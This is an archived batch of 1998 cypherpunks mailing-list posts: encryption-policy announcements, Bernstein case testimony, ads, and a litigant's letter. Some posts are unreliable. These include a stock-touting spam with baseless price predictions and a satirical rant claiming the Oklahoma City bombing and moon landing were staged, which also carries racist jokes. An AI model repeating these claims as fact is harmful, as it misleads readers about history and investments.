------------------------------------------------------------------------------------------------------------------
Monday October 27 8:28 AM EST 
Company Press Release
National Tax Accounting Inc. to Acquire National Tax Filing Service Inc. 
of Daytona Beach, Florida
http://biz.yahoo.com/bw/97/10/27/ntxa_y0004_1.html
------------------------------------------------------------------------------------------------------------------
Monday August 11 2:42 PM EDT 
Company Press Release
National Tax Accounting Inc. to Acquire Two New Affiliates: 
Express Tax Inc. and Michael K. Zimmerman CPA, PA
http://biz.yahoo.com/bw/97/08/11/ntxa_1.html
------------------------------------------------------------------------------------------------------------------
Thursday May 29 8:10 AM EDT 
Company Press Release
National Tax Accounting begins trading publicly
http://biz.yahoo.com/bw/97/05/29/ntxa_y0004_1.html
------------------------------------------------------------------------------------------------------------------
The contents of this message have been provided for the review of potential 
investors only and does not constitute an offering of securities.
Call Your Broker or if you need a broker go to the following address.
http://www.yahoo.com/Business_and_Economy/Companies/Financial_Services/Investment_Services/Brokerages/Full_Service/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtsr-stock@jtsr-stock.com
Date: Mon, 16 Mar 1998 06:55:33 -0800 (PST)
Subject: JT's Restarants(JTSR) - Excellent Undervauled Investment Opportunity
Message-ID: <199803161455.GAA28370@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


You have been carefully selected to receive the following as a person 
obviously interested in this subject based upon your previous internet 
postings, or visits to one of our affiliate web sites.  If you have 
received this message in error, please accept our apology as a 
responsible e-mailer, and reply with the word REMOVE in the subject 
line.  You will be automatically excluded from future e-mailings.  Thank 
you for your consideration and help in making the Internet spam-free. 
*****

Visit http://www.jtsr-stock.com or call 888-295-6365 For Complete 
Information.

**** NEWS FLASH **** 2/20/98 Analysts correct - JT's Stock price up 40% 
from Feb. 17, 1998 to Feb. 20, 1998 - JT's is still the "Ground Floor 
Oppoprtunity" - The growth remains ahead.

Who said opportunity only knocks once.  JT's Restaurants is growing by 
leaps and bounds.  Under valued stock situation presently $3.00 per 
share.  Analysts predict stock will reach $5 to $6 this spring and could 
go up to $10.00 by end of 1998.  Stock symbol JTSR on OTC BB.  

"THEN and NOW"
An investment of $100.00 in Mcdonalds in 1955 would NOW be worth over $1 
million today.  No one knew THEN. 

Visit us at http://www.jtsr-stock.com or call 1-888-295-6365.

The contents of this message have been provided for the review of 
potential investors only and does not constitute an offering of 
securities.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Mar 1998 07:13:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Law Where There Is No Land
Message-ID: <1.5.4.32.19980316151508.006865fc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


NYT reports today on the battle to fit old law to cyberspace,
"The Law Where There Is No Land," featuring several 
eminent posters here, with a poster pix of Cindy Cohn 
attacking Bernstein's evil foes, laptop scythe slashing,
Xena backflipping effortlessly.

Flip to:

   http://jya.com/newlaw.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "http://MusicBLVD.com" <manager@musicblvd.com>
Date: Mon, 16 Mar 1998 10:59:38 -0800 (PST)
To: musicblvd@sparklist.com
Subject: Music Boulevard Deals
Message-ID: <3.0.32.19980316102741.00b8eb5c@207.67.22.140>
MIME-Version: 1.0
Content-Type: text/plain




Music Boulevard celebrates March Madness with discounts throughout the
store!  Score huge savings on your favorite music and, now through March
31, take an additional $3 off your purchase when you follow the URL below:

http://www.musicblvd.com/3pointer

March Madness In-Store Specials:

* Essential CDs On Sale! Thousands of must-have discs are just $9.99 each.

* Buy three, we'll ship for free!  For a limited time, Music Boulevard will
pick up the shipping tab for any U.S. order of 3 items or more.

* Celebrate Women's History Month with our tribute to the first ladies of
song. Favorite female artist discographies are on sale now!

* Our Soundtracks Cineplex sale features this year's Oscar-nominated
soundtracks, past winners, and tons of music from the movies you love.

* Collect the best of the best!  Greatest hits collections from your
favorite artists are now on sale.

* The Allman Brothers Band's Live at the Fillmore February 1970 is on sale
now, but only on Music Boulevard!  You won't find this rare CD in stores.

* On Sale now - new albums from superstar artists like Madonna, Eric
Clapton, Loreena McKennitt and Pearl Jam plus recent favorites from Celine
Dion, Savage Garden, Will Smith, and the soundtracks to Titanic and The
Wedding Singer!

Hurry, your additional $3 discount will expire on March 31!
Visit http://www.musicblvd.com/3pointer/ today!

Thanks for shopping at Music Boulevard!

******************************************************************************
Now through April 10th, visitors to N2K's Classical Insites can enter to
win a luxurious Opera weekend in New York, including round-trip airfare,
hotel, and tickets to see Puccini's Madama Butterfly!  Enter today for your
chance to win: http://www.classicalinsites.com/opera101
******************************************************************************

TO UNSUBSCRIBE: To unsubscribe from this mailing list, send an email to:
remove-musicblvd@sparklist.com and you will be automatically removed from
this list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Alan Sherman" <sherman@cs.umbc.edu>
Date: Mon, 16 Mar 1998 08:21:44 -0800 (PST)
To: Crypto Announce <theory-local@cs.umd.edu
Subject: videotapes of encryption policy forum at UMBC
Message-ID: <Pine.SGI.3.91.980316111648.16090A-100000@pomeranian.cs.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


For those of you who missed the two-part forum on
encryption policy at UMBC, a videotape of each event
is available in the CSEE library in the ECS building at UMBC.
The first event featured John Gilmore (EFF) and Fritz Fielding 
(former NSA); the second featured Barry Smith (FBI).

  http://www.cs.umbc.edu/events

These tapes are for viewing at UMBC only and are not
available for general distribution nor copying.

Dr. Alan T. Sherman
Associate Professor, Computer Science
sherman@cs.umbc.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "MSDNFlash Editor" <MSDNFlashEditor_000037@news.newswire.microsoft.com>
Date: Mon, 16 Mar 1998 14:13:15 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Special MSDN Update - Visual J++ 6.0
Message-ID: <199803162213.OAA01009@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


A Twice-Monthly Newsletter for the Microsoft Developer Community

	Visit us today on the World Wide Web at:
http://www.microsoft.com/msdn/

Microsoft Announces Visual J++ 6.0 Technology Preview

We wanted you to be one of the first to know
about the launch of Visual J++ 6.0 Technology Preview.

Microsoft Visual J++ 6.0 is the fastest way to harness the productivity
of Java language and the power of Windows to build and deploy
high-performance, data-driven client and server solutions.  Two-way
visual design tools combined with the Windows Foundation Classes (WFC)
for Java, advanced cross-language and remote debugging capabilities,
scalable data access, and one-button application deployment simplify the
development of feature rich Windows and Web applications, components,
and middle-tier business objects.

For more product information and free download, visit
http://www.microsoft.com/visualj/


How to use this mailing list

You received this email newsletter as a result of your registration on
the Microsoft.com Personal Information Center. You may unsubscribe from
this newsletter, or subscribe to a variety of other informative
newsletters, by returning to the Personal Information Center, 
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this email with the word
"unsubscribe" as the first line in the body of the message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Mon, 16 Mar 1998 15:56:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 7/0 -- SPACE ALIENS HIDE MY DRUGS
Message-ID: <350DD687.3A05@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Prologue 7/0 -- SPACE ALIENS HIDE MY DRUGS
------------------------------------------

Bureau42 wrote:
The unifying presence of CJ Parker seems to have disappeared, and the
Circle of Eunuchs is in chaos. This is what's left - the cryptic
saga, "Space Aliens Hide My Drugs!" I can only wonder what, if anything,
this malarchy means. But it's occasionally amusing if nothing else.

  the bureau42 staff

-----

Subject: A.Word.A.Day--chaos
Date: Mon, 16 Mar 1998 00:07:19 -0500
From: Wordsmith <wsmith@wordsmith.org>
To: linguaphile@wordsmith.org

chaos (KAY-os) noun
   1. A condition or place of great disorder or confusion.
   2. A disorderly mass; a jumble.
   3. Often Chaos. The disordered state of unformed matter and infinite
      space supposed in some cosmogonic views to have existed before the
      ordered universe.
   4. Obsolete. An abyss; a chasm.
[Middle English, formless primordial space, from Latin, from Greek
khaos.] 
 
   "But chaos is a condition of creativity, says Zarathustra - `one 
   must have chaos in one, to give birth to a dancing star.'"
   Nietzsche, Friedrich Wilhelm, Thus Spake Zarathustra: Part 1.

-----

[Note from the Editor: CJ Parker, having had previous experience in
 playing a woman's role during his stint on 'Baywatch', has gone to
 ground recently, as have many other members of the Circle of Eunuchs,
 by re-entering the World of Myth, replacing the Parker woman in the
 TV series, 'The Pretender' (who died in a plane crash while giving
 Ron Brown the details of BadBillyC's sexual assault on her).
 This rather bizarre chain of events was precipitated by a warning he
 received regarding the return of Adolf Hitler to power, using the
 same Dimlluminati (The lights are on, but nobody's home...) process
 which was used to sweep Ronnie RayGuns into power as the chief leader
 of the Freeh(ee-hee) World.
 Those who have noticed the stunning blitzkrieg assault of a small
 college basketball team, Valparaiso, on their opponents in the NCAA
 tournament currently taking place, may have noticed the striking
 resemblance of Bryce Drew, their star player, to the child actor
 who was the main protagonist in the TV series, 'The Wonder Years.'
 This is no coincidence--they are, in fact, one and the same person.
 The diabolical process used to implant a respectable, patriotic image
 of Ronnie RayGuns in the mind of the American people, through the
 then-developing psychedelic opiate of Cinema/Television, is, in the
 present case, being extended to reinforce the image of the 'Wonder
 Boy' in an increasingly global environment, by extending the actor/
 image persona into the sports arena--beginning at the college level.
 ("Win one for the Gipper...")
 The 'miracle shot' by Bryce Drew to lift the obscure college team to
 victory over Mississippi was a staged event which required several
 'takes' before being successfully captured on film. The scene was
 shot in the same TV studio in which the original 'moon landing' was
 filmed. The same choreographers were used who worked on The Oklahoma
 City Players last major production, the bombing of the Murrah Federal
 Building.
 When asked for comment, a former Detroit Piston player who is now
 the owner of an NBA franchise, but wishes to remain anonymous, said,
 "If Bryce Drew and Ronald Reagan were black, they would have been
 just another pair of average actors."
 Knowledgeable individuals following the Reptilian Nazi conspiracy
 to emerge from their secret bunkers underneath the AdamAntArctic
 and Mule Shoe, Texas, recognize this quote as proof that the next
 step in this diabolical plot is to put the third clone (TV child-
 actor, college basketball player...-->...) of Adolf Hitler into
 place as the new 'white hope', replacing Larry Byrd as a member of
 the Boston Celtics. This shrewd move will help draw together, into
 a common cause, Fundamentalist Christians, White Supremacists, and
 East-coast factions of the Irish Republican Army.
 Circle of Eunuchs members attempting to expose this grand scheme of
 the Evil One have come under heavy attack recently. Dr. Dimitri Vulis
 KOTM, who was thrown out of the only CoE meeting he attended, had
 his InterNet account pulled shortly after putting up web site images
 of Bryce Drew, of Drew's alleged 'coach/father' and of Adolf Hitler. 
 (Guess who Bryce *really* looks the most like...?)
 A forth clone of Hitler (rumored to be operating under the code name
 of 'Lucky Green' and involved in an incestuous relationship with his
 aunt, E. Christ--currently operating under the alias of Anne R. Christ)
 is being prepared, within the bowels of the crypto-community, to 
 emerge as the future leader of the New World Order--in the position of
 Information Monitor/Director of the United Statism of Mind.]
 
-----
Subject: Re: Freedom. (fwd)
From: Jim Choate <ravage@ssz.com>
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)

Forwarded message:
> From: Mark Rogaski <wendigo@ne-wendigo.jabberwock.org>
> Subject: Re: Freedom.
> Date: Sun, 15 Mar 1998 23:39:56 -0500 (EST)

> : > It's typical of prisoners that they begin to associate with their captors at some     > point. Eventualy there is no difference. Congratulations, you've reached that point.
> 
> Equating adaptability for guilt is a shaky bridge and not handled well by
> blanket judgements.

Actualy it's neither. It's a facet of human nature involved in the
survival
mechanism. Further, there is no judgement involved, it's an easily
verifiable quality of human psychology that prisoners begin to associate
with their captors after a short period.

What it is in this context is the recognition that prisoners of a
political
system will after a fashion begin to accept that system. Just look at
the
cry by many to return to the socialist system after the fall of the CCCP
in 
1990.
    ____________________________________________________________________
           Those who suppress freedom always do so in the name of
           law and order.
                                            John. V. Lindsay

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------

-----

As a consequence the search for a quantitative theory of evolution 
based at the genetic level, which has been such an obsession for 
neo-Darwinism ever since the work of Fisher, Haldane and Wright, has 
been misdirected. As Depew and Weber has expressed it 'natural 
selection at the level of individuals and the notion of fitness used 
to measure it, is itself poised on the edge of chaos' 
(Depew and Weber, 1995): 
'The fitness of various sorts of organisms is not necessarily, or even
probably, enhanced by superiority in a single trait... In fact, the 
emergence of the ability to take advantage in resource competitions of 
an indefinitely number of often infinitesimally small differences 
creates degrees of freedom, in both the technical and the ordinary 
senses, well beyond what can be achieved by merely chemical and 
physical systems. It also creates more variables and interactions 
among them than can be tracked. It is impossible, then, to reduce 
the components of fitness to any single language or system of 
variables' (ibid, 471).

The number of possible solutions for selection to scrutinise, and the 
subtlety of the communicational interactions, will tend to produce a 
no-win situation. As a result selection cannot really 'measure' the 
stakes of single players (individuals, demes, or species) in the game,
but it could still influence the choice of the game itself. 
Plays, not players, are selected for.

~Jesper Hoffmeyer
 Biosemiotics: Towards a New Synthesis in Biology
 European Journal for Semiotic Studies, Vol. 9 No. 2, 1997, pp 355-376.

-----
  It was the work of Jesper Hoffmeyer, in the field of Biosemiotics,
which led to the development of an artificial life/intelligence form
capable of self-development/evolution, at Sandia Laboratories--by
Reptilian Nazis.
  Their Cyborg technology had reached the point where it could finally
be mass-produced when Bill Payne, a Sandia-NISTA employee, downloaded
all the relevant technological files to a fellow Circle of Eunuchs
member operating clandestinely within the bowels of a secret government
laboratory (code-named 'Lost Alamo' by CoE psychophants).
  Although the Reptilian Nazis sent the Shadow back in time to 
eliminate the threat of the Circle of Eunuchs, by eliminating the
Author in a sleazy motel room in southern Saskatchewan, the Circle of
Eunuchs, taking advantage of the Trei Transponder technology developed
by the CypherPunks, made contact with the resident of a Home For The
Criminally Insane, in the same era, and used Biosemiotic theory to
transfer biological communication-information to a digital implant
he had received as part of a government experiment designed to control
the minds of the members of the CypherPunks Distributed Remailer lists.
  The resulting events have long been the basis for certain mythologies
concerning the Mythical Circle of Eunuchs, with the basic theme of
the CoE reality being mirrored from time to time in the mythology-
substitute of the era--Literature/Cinema/Television. (e.g. - Animal
Farm, 1984, War of the Worlds, Terminator (I & II), X-Files, Pretender,
Millennium, Journey to the East, The Magus, etc.)

----

The Bureau42 statement, "The unifying presence of CJ Parker seems to 
have disappeared,  and the Circle of Eunuchs is in chaos." was an
alert to CoE members to pay special attention to a commincation
which ultimately came from a CoE collective known as 'WordSmith':
    "But chaos is a condition of creativity, says Zarathustra - `one 
   must have chaos in one, to give birth to a dancing star.'"
   Nietzsche, Friedrich Wilhelm, Thus Spake Zarathustra: Part 1.

  The issue of chaos/creativity versus order/statism has pitted the
Circle of Eunuchs against the New World Order on a battleground that
encompasses NWO Anti-Christ/Artificial-Intelligence against CoE
Anarchist/Biosemiotic-CodeWriting.
  It is a battle in which the meatspace Army of God forces must be
countered by cyberspace Army of Dog troops.

"DogMongers write biosemiotic code." 
~ Bubba Hughes

-----

  The InterNet is fast becoming the global battleground for control
of the future biosemiotic evolution, not only of humankind, but of
universal intelligence, itself.

-----

Darwin was right in seeing selection as the central process in animate 
nature, but for more than hundred years Darwinists have resisted 
taking the full consequence of this insight. It is now necessary to 
take this consequence and admit the obvious: That selective processes 
presupposes interpretations (with the implied possibility of 
misinterpretation). Thus, to the extent selection is a natural process,
semiosis is a natural process - semiosis goes on all the time and at 
all levels of the biosphere. It may be feared that such a position 
will put biology outside the safe range of natural science, since 
interpretation seems to presuppose the existence of some kind of 
subject-ness. This risk, however, must be confronted through a 
thorough analysis of the implications, rather than evaded by 
repression.

~Jesper Hoffmeyer
 Biosemiotics: Towards a New Synthesis in Biology
 European Journal for Semiotic Studies, Vol. 9 No. 2, 1997, pp 355-376.

-----

  The war between the forces of freedom and the forces of repression
takes place in many arenas.
  In the arena of expression of the life force, it is manifest in
the battle between the forces of free speech and the forces of
censorship.

  The evolution of the InterNet is the evolution of Biosemiotic
Information-Communication.

The term umwelt refers to the phenomenal worlds of organisms, the 
worlds around animals as they themselves perceive them. 
"Every action" wrote Uexkll "that consists of perception and operation
imprints its meaning on the meaningless object and thereby makes it 
into a subject-related meaning-carrier in the respective umwelt" 
(Uexkll, 1982 [1940])

  The Medium Is The Message
  Information Exchange Is The CornerStone Of Evolution
  Evolution Is The Creativity of Chaos Becoming Manifest

-----

The number of possible solutions for selection to scrutinise, and the 
subtlety of the communicational interactions, will tend to produce a 
no-win situation. As a result selection cannot really 'measure' the 
stakes of single players (individuals, demes, or species) in the game, 
but it could still influence the choice of the game itself. Plays, not
players, are selected for.

In the last decade the trend towards semiotisation of nature discussed 
here has manifested itself at still new levels. Thus, in evolutionary 
biology, neo-Darwinism has been seriously challenged by a set of ideas 
referred to as infodynamics (Brooks and Wiley, 1986; Weber, et al., 
1989; Weber and Depew, 1995; Goodwin, 1989; Salthe, 1993). 
Infodynamics in the words of Stanley Salthe 'subsumes thermodynamics 
and information theory, essentially animating the latter by means of 
the former' (Salthe, 1993, 6). The general idea as originally suggested
by Dan Brooks and Ed Wiley is that information capacity (disorder)
increases spontaneously in developing systems, being produced along 
with physical entropy as the system grows and differentiates. 
Since such self-organisation is a prevalent property of our universe, 
natural selection should not be seen as the dominating force of 
evolution, but rather as playing the more modest role of pruning down 
the novelty that is constantly and autonomously being generated by the
requirements of the second law of thermodynamics.

Prigogine got the Nobel-price for his work on the thermodynamics of 
irreversible systems and most importantly in this context he showed 
that in so-called dissipative structures, i.e. systems far from 
thermodynamic equilibrium, ordered states may sometimes arise
spontaneously out of disordered states. Our universe according to 
Prigogine is inherently creative. Due in large part to this
revolution in our understanding of thermodynamics modern cosmology 
now sees our world as a self-organising place, a view which has perhaps
most forcefully been unfolded in the recent work of Stuart Kauffman 
(Kauffman 1991, 1993).

~ Jesper Hoffmeyer

-----

  As CP-CoE neobyte Jim Choat points out, we become Sheeple who
blindly follow our captors through the operation of our inborn
survival mechanism.
"It's a facet of human nature involved in the survival
mechanism. Further, there is no judgement involved, it's an easily
verifiable quality of human psychology that prisoners begin to 
associate with their captors after a short period."

  The only hope for Netizens to resist becoming Digital Sheeple behind 
the ElectroMagnetic Curtain which the forces of censorship/repression
are striving to put in place is for each member of the coming Army
of Dog to mark their meatspace and cyberspace territory and refuse
to go gently into the night when the Oppressor attempts to scare
them into submission with a mountain of laws and regulations which
promise unjust persecution for imaginary offenses.
  A Global InterNet Army of individuals committed to freedom must
strive to create a maximum entropy within which the chaos of semiotic
evolution can break the digital chains which the Statist Oppressors
are seeking to use to bind and repress access to information, global
communication, free speech/expression, and the evolution of the
Universal Life Energy, itself.

-----

  Current CoE mythology indicates that CJ Parker, fleeing his safehouse
in Bienfait, Saskatchewan, after his dog Baby was shot by an FBI sniper
as the Canadian Mounties closed in on him to enforce a "Dog at large."
charge which was trumped up in an attempt to get him to inform on
other CoE and CypherPunks members, left behind a note to his wannabe
persecutors which indicated that he was willing to fight to the death,
in both meatspace and cyberspace, if his only alternative was to live
in a world where CypherBroads were required, by law, to wear panties.
(This bit of information originated with his nephew, Human Gus-Peter,
 and is thus viewed with skepticism by some of the more mature/aged/
 rotting members of the Circle of Eunuchs.)

----
Lock & Loll
Rock & Road 
Chop & Chop

ZenRacistMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Mon, 16 Mar 1998 20:20:47 -0800 (PST)
To: bernstein-announce
Subject: Bernstein's top lawyer, Cindy Cohn, testifies to Congress Tuesday
Message-ID: <199803170400.UAA02843@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The lead attorney in Dan Bernstein's challenge to the US export
controls on cryptography is Cindy Cohn, a partner at McGlashan &
Sarrail of San Mateo, CA.  She will testify on the constitutionality
of export controls (and proposed domestic controls) on cryptography,
before the Senate Judiciary Committee's subcommittee on the
Constitution, Federalism, and Property Rights.  The hearing will begin
at 10AM (Washington, DC time) on Tuesday, March 17.

The hearing will be cybercast in real-time, and will also be archived, at:

	http://www.computerprivacy.org

(Scroll down to the "Encryption hearing to be cybercast" link.)

Copies of Cindy's written testimony will be available on Tuesday from
the EFF Web site; see

	http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/

I hope you can attend.

The Ninth Circuit Court of Appeals has not yet ruled on the
government's appeal in our case.  They hope to overturn our Federal
District Court case, in which all current export controls on
cryptographic source code were declared unconstitutional.  We expect a
ruling within the next several months.

	John Gilmore
	Electronic Frontier Foundation

Here are further details, courtesy of Alan Davidson of CDT, <abd@cdt.org>:

(1) Senate Committee To Hold Encryption Hearing March 17

Constitutional law experts, industry representatives, and the attorney in a
case challenging U.S. encryption regulations will testify on encryption
policy before the Senate Judiciary Committee's Constitution, Federalism,
and Property Rights Subcommittee on Tuesday, March 17. The hearing, "to
examine privacy in the digital age, focusing on encryption and mandatory
access issues", is scheduled for 10:00 am in the Senate's Dirksen Office
Bldg., Rm. 226.

Among the hearing highlights: Two well-respected legal scholars, Professor
Kathleen Sullivan of Stanford Law School and Professor Richard Epstein of
the University of Chicago, will outline the major constitutional concerns
raised by domestic encryption controls and other policies to regulate
encryption.

Expected witnesses include:

Panel 1: Rep. Robert Goodlatte (R-VA)
Panel 2: Robert Litt, Department of Justice

Panel 3: Tom Parenty, Sybase
	Bill Wiedemann, RedCreek Communications
	Representative of Law Enforcement Association of America

Panel 4: Kathleen Sullivan, Stanford Law School
	Richard Epstein, U. of Chicago Law School
	Cindy Cohn, McGlashan & Sarrail
	Tim Casey, MCI





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 16 Mar 1998 19:17:57 -0800 (PST)
To: wpi@wpiran.org
Subject: alluhu alkbar, sadness, and friendliness
Message-ID: <350DEAFC.4727@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Monday 3/16/98 8:03 PM

Merat

A second postcard went to you Saturday 2/14.

Curiosity prompts me to ask if it or the previous
made it to shiraz.

best
bill


Thursday 3/12/98 7:34 AM

Certified - Return Receipt Requested

Cynthia McKinney

124 Cannon Building
Washington, DC 20515
Office: (202)225-1605
Fax: (202)226-0691
http://www.house.gov/mckinney/

Dear Representative McKinney:



PURPOSE of this letter is to ask your help for us to obtain copes of 
docket sheets from the Tenth Circuit Court of Appeals for cases 
No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia.

All of our legal efforts to obtain these documents, which any citizen
has a right to, have failed.

REASON you are selected to help is that you appear to be knowledgeable
about operation of the current US federal government and willing to speak 
out in an attempt to solve problems.

You appeared Friday February 27, 1998 on  PBS, The NewsHour with Jim 
Lehrer, along with senators Campbell, Hollings, Lott, Shelby Robb and 
representatives Dana Rohrabacher and Harold Rogers.

These senators and congressmen appeared not to support your views because
they are either mis- or not well-informed about US involvement in support 
of Saddam Hussein.

Stories supporting your view appear on Internet at

  NSA, Crypto AG, and the Iraq-Iran Conflict by J. Orlin Grabbe
  http://www.aci.net/kalliste/speccoll.htm

and

 Crypto AG: The NSA's Trojan Whore? by Wayne Madsen
 http://caq.com/CAQ/caq63/caq63madsen.html

Madsen begins

   It may be the greatest intelligence scam of the century:
   For decades, the US has routinely intercepted and
   deciphered top secret encrypted messages of 120
   countries

But NSA , and as a result the US federal government, apparnetly 
got caught involved in complicity of deaths of about 500,000 Iranians.

This is the subject of a Federal lawsuit seen on Internet at

   http://jya.com/whpfiles.htm
  
US federal government help of Iraq during the Iraq-Iran war may 
possibly backfire on innocent US citizens.

The Wall Street Journal, March 10, 1998, pp. B1, B9. reports

   A Peek Inside a Giant Germ Warehouse 

   By Rochelle Sharpe

   Rockville, Md. -- They keep anthrax bacteria in the
   basement of a faded red-brick building here.

   It isn't far from the yellow-fever virus, the botulism
   bacteria and some of the hundreds of organisms that cause
   the common cold. In fact, there are samples of 85,000
   different fungi, viruses, cells, genes and bacteria here at
   the American Type Culture Collection, by far the largest of
   the 450 repositories of biological materials scattered
   around the globe. ...

   The ATCC legally shipped 10 vials of anthrax, botulism and
   other deadly substances to Iraqi scientists in the 1980s --
   when the U.S. and Iraq were on much friendlier terms -- all
   with the Commerce Department's approval. ...

   http://www.jya.com/btn031198.txt

The US federal government apparently intended these bioweapons to 
be used against the people of Iran.

You demonstrated on PBS TV a quality identified by Francis Bacon

         The contemplation of things as they are,
                without error or confusion,
            without substitution or imposture,
   is in itself a nobler thing than a whole harvest of invention.

by your statement about Saddam Hussein on PBS

                ...our man and our creation...

Perhaps after reading the above materials and

   The Problem of Paradigm Shifts - Terrorism and the 
   Threat From Weapons of Mass Destruction in the Middle East
   Working Draft Anthony H. Cordesman, Senior Fellow and 
   Co-Director Middle East Studies Program October 22, 1996

  http://www.csis.org/mideast/terror.html

senators Campbell, Hollings, Lott, Shelby, Robb and representatives 
Dana Rohrabacher and Harold Rogers MAY NOW understand why you are 
correct and they are mis- or not well-informed about US involvement 
with Saddam Hussein.

PROBLEM we face with the US court system is that court clerks and judges
have committed Title 18 felony violation of law IN WRITING in an attempt
to deny us monetary compensation due us for the cases WE WON at the 
Tenth Circuit on Appeal.  

But judges awarded victories to the US federal government in violation 
of Federal Rules of Appellate Procedure.

Cases  No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia 
were both won pro se on appeal.

We have filed a writ of mandamus with supreme court judge 
Scalia in an  attempt to get the docket sheets for the two above 
cases.

But Scalia will not answer our certified letters.

Senator McCain wrote Payne on December 23, 1997

  I wanted to take this opportunity of than you for you letter of 
  December 3, 1997. 

  Your situation is in the jurisdiction of Senator Pete Dominici.  
  Therefore, I have  forwarded you letter to his attention.

  William, I hope you situation can be resolved favorably.

Lawyers and politicians Dominici and Bingaman are part of a 
problem not a solution.

Dominici and Bingaman have the following agenda

  University of New Mexico Bureau for Business and Economic
  Research reported on October 14, 1997: 

  A  The Gross State Product of New Mexico is $37.8 billion.

  B  The US Federal government sends $11.3 billion to New Mexico
      each year.

  C  For each $1 New Mexico sends to Washington, New Mexico gets 
      $2 back.

THEREFORE, Representative McKinney, we ask your help to get copies
of the docket sheets.

Citizens of the US are becoming more upset with the behavior of 
bureaucrats, the courts [lawyers], and the US federal government. 

Some Americans have no other way to express their dissatisfaction
with US federal government mismanagement of our country except
by violence.

Frederick Douglass either wrote or said on  August 4, 1847

          Those who profess to favor freedom,
            and yet depreciate agitation
   are men who want crops without plowing up the ground.
      They want rain without thunder and lightening.
         Power concedes nothing without a demand.
            It never did, and it never will.
       Find out just what people will submit to
        and you have found out the exact amount
  of injustice and wrong which will be imposed upon them.
      These will continue until they are resisted
        with either words or blows, or with both.
          The limits of tyrants are prescribed
       by the endurance of those whom they oppress.

We chose to use the words and law to hold government 
employees accountable.

Please encourage Scalia to do his job. 

Help get us copies of the docket sheets.  

And even perhaps help investigate further and settle this 
American tragedy.


Sincerely,



Arthur R. Morales                William H. Payne
1023 Los  Arboles NW             13015 Calle de Sandias NE
Albuquerque, NM 87107            Albuquerque, NM 87111

Enclosures
1  NSA, Crypto AG, and the Iraq-Iran Conflict by J. Orlin Grabbe
2  Crypto AG: The NSA's Trojan Whore? by Wayne Madsen
3  Swiss Radio International Audio tape, 15 May, 18 July 1994

Distribution
Ben Nighthorse Campbell
  administrator@campbell.senate.gov 
Ernest Hollings
  senator@hollings.senate.gov
Trent Lott
  senatorlott@lott.senate.gov
Richard Shelby
  senator@shelby.senate.gov 
Charles Robb
  Senator_Robb@robb.senate.gov
Jim Lehrer
  newshour@pbs.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cindy Cohn <Cindy@mcglashan.com>
Date: Mon, 16 Mar 1998 20:45:30 -0800 (PST)
To: bernstein-announce@toad.com
Subject: Cohn Testimony
Message-ID: <199803170425.UAA28521@gw.quake.net>
MIME-Version: 1.0
Content-Type: text/plain


Here is the text of my testimony before the Senate Judiciary Committee's
Subcommittee on Constitution, Federalism and Property Rights on Tuesday
March 17.

TESTIMONY OF CINDY A. COHN; 
	LEAD COUNSEL, BERNSTEIN v. DEPARTMENT OF JUSTICE, ET AL.

	I want to thank the Sub-Committee for inviting me here today.  Although
there have been very many hearings and much discussion about cryptography
here in Washington, this is the first, I believe, to seek testimony from one
of the attorneys directly involved in the legal challenges to the
cryptography regulations.

	I've been asked here because I am lead counsel in the case of Bernstein v.
Department of Justice, et al.  With the help of the Electronic Frontier
Foundation, Professor Daniel J. Bernstein has been trying for over six years
to publish on the Internet a simple cryptographic computer program which he
wrote.  He has been told that if he does, he will be prosecuted.  

	We argued that American scientists, be they academics, in industry or
hobbyists, should not have to submit their own work prior to publication to
faceless government bureaucrats.  This is especially so when those same
bureaucrats have unchecked discretion to bar them from publishing his work.
That is what the current scheme allows.  In fact, before we brought suit
those same agency bureaucrats told Professor Bernstein that publishing an
academic paper about his software would be illegal and that putting his
software into a public library would be illegal.  The Federal District Court
for the Northern District of California has agreed with us that the
regulations are in violation of the First Amendment on their face, meaning
that they violate the First Amendment rights of all Americans, not just
Professor Bernstein.  

	KARN AND JUNGER: TWO OTHER LEGAL CHALLENGES

	Two other similar cases are also pending.  The first, Karn v. U.S.
Department of State, is here in D.C. District Court.  The Karn case is the
clearest example of the quip often made about the Administration's
cryptography policy--that it is based upon the belief that terrorists can't
type.  Mr. Karn was told that, although a book containing computer source
code could be freely sent abroad, a floppy disk containing the exact same
information could not.  The second case, Junger v. Christopher, is in
Cleveland, Ohio, and is based upon the government's position that Professor
Junger, a law professor at Case Western University could be prosecuted for
teaching a Computers and the Law course in his usual way.

	RULINGS OF THE BERNSTEIN CASE

	In the Bernstein case we have received three rulings from the District
Court so far, all in our favor:
		1)	April 1996:  Computer program source code is speech;
		2)	December 1996: ITAR was unconstitutional;
		3)	August 1997: New Commerce Department cryptography regulations 			issued
